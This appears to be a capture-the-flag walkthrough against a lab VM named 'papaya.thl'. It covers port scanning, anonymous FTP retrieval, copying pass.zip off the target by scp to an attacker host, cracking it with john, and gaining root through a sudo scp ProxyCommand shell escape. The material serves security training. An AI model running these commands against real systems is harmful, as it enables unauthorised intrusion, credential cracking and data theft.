[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.3.56:22 Open 192.168.3.56:21 Open 192.168.3.56:80 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.3.56 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-30 21:52 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 21:52 Completed NSE at 21:52, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 21:52 Completed NSE at 21:52, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 21:52 Completed NSE at 21:52, 0.00s elapsed Initiating ARP Ping Scan at 21:52 Scanning 192.168.3.56 [1 port] Completed ARP Ping Scan at 21:52, 0.04s elapsed (1 total hosts) Initiating SYN Stealth Scan at 21:52 Scanning papaya.thl (192.168.3.56) [3 ports] Discovered open port 22/tcp on 192.168.3.56 Discovered open port 80/tcp on 192.168.3.56 Discovered open port 21/tcp on 192.168.3.56 Completed SYN Stealth Scan at 21:52, 0.02s elapsed (3 total ports) Initiating Service scan at 21:52 Scanning 3 services on papaya.thl (192.168.3.56) Completed Service scan at 21:52, 28.54s elapsed (3 services on 1 host) Initiating OS detection (try #1) against papaya.thl (192.168.3.56) NSE: Script scanning 192.168.3.56. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 21:52 NSE: [ftp-bounce 192.168.3.56:21] PORT response: 500 Orden PORT ilegal Completed NSE at 21:52, 16.72s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 21:52 Completed NSE at 21:52, 0.45s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 21:52 Completed NSE at 21:52, 0.00s elapsed Nmap scan report for papaya.thl (192.168.3.56) Host is up, received arp-response (0.00056s latency). Scanned at 2026-04-30 21:52:08 CST for 47s
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 64 | fingerprint-strings: | GenericLines: | 220 Servidor ProFTPD (Debian) [::ffff:192.168.3.56] | Orden incorrecta: Intenta ser m | creativo | Orden incorrecta: Intenta ser m | creativo | Help: | 220 Servidor ProFTPD (Debian) [::ffff:192.168.3.56] | 214-Se reconocen las siguiente | rdenes (* =>'s no implementadas): | XCWD CDUP XCUP SMNT* QUIT PORT PASV | EPRT EPSV ALLO RNFR RNTO DELE MDTM RMD | XRMD MKD XMKD PWD XPWD SIZE SYST HELP | NOOP FEAT OPTS HOST CLNT AUTH* CCC* CONF* | ENC* MIC* PBSZ* PROT* TYPE STRU MODE RETR | STOR STOU APPE REST ABOR RANG USER PASS | ACCT* REIN* LIST NLST STAT SITE MLSD MLST | comentario a root@papaya | NULL, SMBProgNeg, SSLSessionReq: |_ 220 Servidor ProFTPD (Debian) [::ffff:192.168.3.56] | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 ftp ftp 19 Jul 2 2024 secret.txt 22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) | ssh-hostkey: | 256 bb:05:10:69:18:eb:e3:44:2c:a7:68:98:d0:97:01:20 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFnh3KAOtFRAIMsWOIip+Q2MGFR4A7t5/fzhF1o/JtYmsjB7J2/XOUpU1h1qI/rdXBe3SPBsWPLa/OnGcTlFT8I= | 256 65:41:aa:54:a6:b7:f7:2a:04:2e:c4:6a:c0:4d:10:35 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAVKDRl7RIGDh3jSVkPcFll6/h+IR1UiiDICB2I1+xU8 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.59 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-favicon: Unknown favicon MD5: B9FF92880E63138F9B87035C95C15E9F |_http-server-header: Apache/2.4.59 (Debian) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: My Community - Index 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port21-TCP:V=7.99%I=7%D=4/30%Time=69F35E8E%P=x86_64-pc-linux-gnu%r(NULL SF:,35,"220\x20Servidor\x20ProFTPD\x20\(Debian\)\x20\[::ffff:192\.168\.3\. SF:56\]\r\n")%r(GenericLines,97,"220\x20Servidor\x20ProFTPD\x20\(Debian\)\ SF:x20\[::ffff:192\.168\.3\.56\]\r\n500\x20Orden\x20incorrecta:\x20Intenta SF:\x20ser\x20m\xc3\xa1s\x20creativo\r\n500\x20Orden\x20incorrecta:\x20Int SF:enta\x20ser\x20m\xc3\xa1s\x20creativo\r\n")%r(Help,273,"220\x20Servidor SF:\x20ProFTPD\x20\(Debian\)\x20\[::ffff:192\.168\.3\.56\]\r\n214-Se\x20re SF:conocen\x20las\x20siguiente\x20\xc3\xb3rdenes\x20\(\*\x20=>'s\x20no\x20 SF:implementadas\):\r\n\x20CWD\x20\x20\x20\x20\x20XCWD\x20\x20\x20\x20CDUP SF:\x20\x20\x20\x20XCUP\x20\x20\x20\x20SMNT\*\x20\x20\x20QUIT\x20\x20\x20\ SF:x20PORT\x20\x20\x20\x20PASV\x20\x20\x20\x20\r\n\x20EPRT\x20\x20\x20\x20 SF:EPSV\x20\x20\x20\x20ALLO\x20\x20\x20\x20RNFR\x20\x20\x20\x20RNTO\x20\x2 SF:0\x20\x20DELE\x20\x20\x20\x20MDTM\x20\x20\x20\x20RMD\x20\x20\x20\x20\x2 SF:0\r\n\x20XRMD\x20\x20\x20\x20MKD\x20\x20\x20\x20\x20XMKD\x20\x20\x20\x2 SF:0PWD\x20\x20\x20\x20\x20XPWD\x20\x20\x20\x20SIZE\x20\x20\x20\x20SYST\x2 SF:0\x20\x20\x20HELP\x20\x20\x20\x20\r\n\x20NOOP\x20\x20\x20\x20FEAT\x20\x SF:20\x20\x20OPTS\x20\x20\x20\x20HOST\x20\x20\x20\x20CLNT\x20\x20\x20\x20A SF:UTH\*\x20\x20\x20CCC\*\x20\x20\x20\x20CONF\*\x20\x20\x20\r\n\x20ENC\*\x SF:20\x20\x20\x20MIC\*\x20\x20\x20\x20PBSZ\*\x20\x20\x20PROT\*\x20\x20\x20 SF:TYPE\x20\x20\x20\x20STRU\x20\x20\x20\x20MODE\x20\x20\x20\x20RETR\x20\x2 SF:0\x20\x20\r\n\x20STOR\x20\x20\x20\x20STOU\x20\x20\x20\x20APPE\x20\x20\x SF:20\x20REST\x20\x20\x20\x20ABOR\x20\x20\x20\x20RANG\x20\x20\x20\x20USER\ SF:x20\x20\x20\x20PASS\x20\x20\x20\x20\r\n\x20ACCT\*\x20\x20\x20REIN\*\x20 SF:\x20\x20LIST\x20\x20\x20\x20NLST\x20\x20\x20\x20STAT\x20\x20\x20\x20SIT SF:E\x20\x20\x20\x20MLSD\x20\x20\x20\x20MLST\x20\x20\x20\x20\r\n214\x20Env SF:\xc3\xada\x20comentario\x20a\x20root@papaya\r\n")%r(SSLSessionReq,35,"2 SF:20\x20Servidor\x20ProFTPD\x20\(Debian\)\x20\[::ffff:192\.168\.3\.56\]\r SF:\n")%r(SMBProgNeg,35,"220\x20Servidor\x20ProFTPD\x20\(Debian\)\x20\[::f SF:fff:192\.168\.3\.56\]\r\n"); MAC Address: 08:00:27:A2:17:C8 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.99%E=4%D=4/30%OT=21%CT=%CU=41449%PV=Y%DS=1%DC=D%G=N%M=080027%TM OS:=69F35EB7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I% OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5 OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6= OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O% OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N OS:%T=40%CD=S)
Uptime guess: 39.372 days (since Sun Mar 22 12:57:55 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Hosts: Servidor, 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.56 ms papaya.thl (192.168.3.56)
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 21:52 Completed NSE at 21:52, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 21:52 Completed NSE at 21:52, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 21:52 Completed NSE at 21:52, 0.00s elapsed Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 47.30 seconds Raw packets sent: 26 (1.938KB) | Rcvd: 20 (1.563KB)
┌──(root㉿Eecho)-[~] └─# ftp 192.168.3.56 Connected to 192.168.3.56. 220 Servidor ProFTPD (Debian) [::ffff:192.168.3.56] Name (192.168.3.56:root): anonymous 331 Conexión anónima ok, envía tu dirección de email como contraseña Password: 230 Aceptado acceso anónimo, aplicadas restricciones Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||48879|) 150 Abriendo conexión de datos en modo ASCII para file list -rw-r--r-- 1 ftp ftp 19 Jul 2 2024 secret.txt 226 Transferencia completada ftp> get secret.txt local: secret.txt remote: secret.txt 229 Entering Extended Passive Mode (|||50994|) 150 Opening BINARY mode data connection for secret.txt (19 bytes) 100% |***************************************************************************| 19 5.04 KiB/s 00:00 ETA 226 Transferencia completada 19 bytes received in 00:00 (3.33 KiB/s) ftp> ^D 221 Hasta luego ┌──(root㉿Eecho)-[~] └─# cat secret.txt ndhvabunlanqnpbñb
www-data@papaya:/opt$ ls pass.zip www-data@papaya:/opt$
解压的时候发现需要凭证。这里直接复制到kali进行爆破
1 2 3 4 5 6 7 8 9 10
www-data@papaya:/opt$ scp pass.zip root@10.200.70.98:/tmp/aaaa The authenticity of host '10.200.70.98 (10.200.70.98)' can't be established. ED25519 key fingerprint is SHA256:ZyUbPteDlhKgfFR102PGhJUWNS++vR62HchhPFY2Cfw. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Could not create directory '/var/www/.ssh' (Permission denied). Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts). root@10.200.70.98's password: pass.zip 100% 173 117.8KB/s 00:00 www-data@papaya:/opt$
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(root㉿Eecho)-[/tmp/aaaa] └─# zip2john pass.zip > zip_hash2.txt ver 2.0 pass.zip/pass.txt PKZIP Encr: cmplen=23, decmplen=11, crc=EEA46B01 ts=89BB cs=eea4 type=0 ┌──(root㉿Eecho)-[/tmp/aaaa] └─# ls authorized_keys backup backup.zip lxd-alpine-builder pass.zip zip_hash2.txt zip_hash.txt ┌──(root㉿Eecho)-[/tmp/aaaa] └─# john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash2.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 24 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status jesica (pass.zip/pass.txt) 1g 0:00:00:00 DONE (2026-04-30 15:12) 50.00g/s 2457Kp/s 2457Kc/s 2457KC/s 123456..trudy Use the "--show" option to display all of the cracked passwords reliably Session completed. ┌──(root㉿Eecho)-[/tmp/aaaa] └─#
papaya@papaya:/opt$ sudo -l Matching Defaults entries for papaya on papaya: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User papaya may run the following commands on papaya: (root) NOPASSWD: /usr/bin/scp papaya@papaya:/opt$ sudo /usr/bin/scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x: # id uid=0(root) gid=0(root) grupos=0(root) # /bin/bash -p root@papaya:/opt#